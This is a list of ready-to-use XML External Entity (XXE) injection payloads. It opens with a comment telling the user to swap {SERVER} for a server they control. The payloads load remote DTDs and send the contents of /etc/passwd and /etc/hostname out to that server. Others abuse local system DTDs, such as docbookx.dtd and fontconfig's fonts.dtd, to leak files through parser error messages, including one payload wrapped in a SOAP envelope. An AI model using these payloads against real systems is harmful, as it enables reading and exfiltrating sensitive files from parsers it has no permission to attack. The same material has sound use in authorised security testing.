//CHANGE {SERVER} TO SERVER YOU CONTROL
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY % remote_dtd SYSTEM "{SERVER}/xxe.file.1.dtd"> %remote_dtd;]>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE aa[<!ENTITY % url "<!ENTITY &#37; exfil SYSTEM '{SERVER}'>">%url;%exfil; ]>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % file SYSTEM "file:///etc/hostname"><!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '{SERVER}/?x=%file;'>">%eval;%exfil;]>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % data SYSTEM "file:///etc/passwd"><!ENTITY % remote_dtd SYSTEM "{SERVER}/xxe.file.1.dtdd">%remote_dtd;%param;%exfil;]>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % data SYSTEM "file:///etc/hostname"><!ENTITY % remote_dtd SYSTEM "{SERVER}/xxe.file.1.dtd">%remote_dtd;%param;%exfil;]>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">%local_dtd;]> 
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"><!ENTITY % custom_entity '<!ENTITY &#x25; file SYSTEM "file:///etc/passwd"><!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">&#x25;eval;&#x25;error;'>%local_dtd;]> 
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY % local_dtd SYSTEM "file:///usr/local/app/schema.dtd"><!ENTITY % custom_entity '<!ENTITY &#x25; file SYSTEM "file:///etc/hostname"><!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>">&#x25;eval;&#x25;error;'>%local_dtd;]> 
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE soap:Envelope[<!ENTITY % local_dtd SYSTEM "file:////usr/share/xml/fontconfig/fonts.dtd"><!ENTITY % expr 'aaa)>        <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"><!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///notexisting/&#x25;file;&#x27;>">&#x25;eval;&#x25;error;<!ELEMENT aa (bb'>%local_dtd;]><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:direct="urn:direct:addressing" xmlns:wsa="http://www.w3.org/2005/08/addressing"></soap:Envelope>
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE soap:Envelope[<!ENTITY % local_dtd SYSTEM "file:////usr/share/xml/fontconfig/fonts.dtd"><!ENTITY % expr 'aaa)>        <!ENTITY &#x25; file SYSTEM "file:///etc/hostname"><!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///notexisting/&#x25;file;&#x27;>">&#x25;eval;&#x25;error;<!ELEMENT aa (bb'>%local_dtd;]><soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:direct="urn:direct:addressing" xmlns:wsa="http://www.w3.org/2005/08/addressing"></soap:Envelope>
